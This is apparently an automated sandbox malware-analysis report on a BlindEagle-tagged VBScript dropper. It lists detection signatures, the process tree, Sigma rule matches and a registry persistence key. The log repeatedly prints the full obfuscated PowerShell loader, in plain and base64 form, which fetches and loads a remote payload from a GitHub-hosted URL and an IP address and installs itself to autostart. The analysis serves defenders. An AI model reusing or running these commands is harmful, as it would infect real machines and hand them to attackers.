Windows Analysis Report
WW8kzvnphl.vbs

Overview

General Information

Sample name: WW8kzvnphl.vbs (renamed because original name is a hash value)
Original sample name: 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs
Analysis ID: 1523826
MD5: adadc5d47f87dd519f9a7da9ba03daf5
SHA1: 3de39ed4ff76305d9dc87b484bf2b78d7f332dbf
SHA256: 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd
Tags: BlindEagle, vbs, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Command shell drops VBS files
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7412 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7972 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 8164 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7464 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 7628 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powe
Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, 
d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdO
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', 
'+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdO
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', 
'+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdO
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", ProcessId: 7412, ProcessName: wscript.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\autopatia.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs", ProcessId: 7740, ProcessName: cmd.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", ProcessId: 7412, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powe
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe 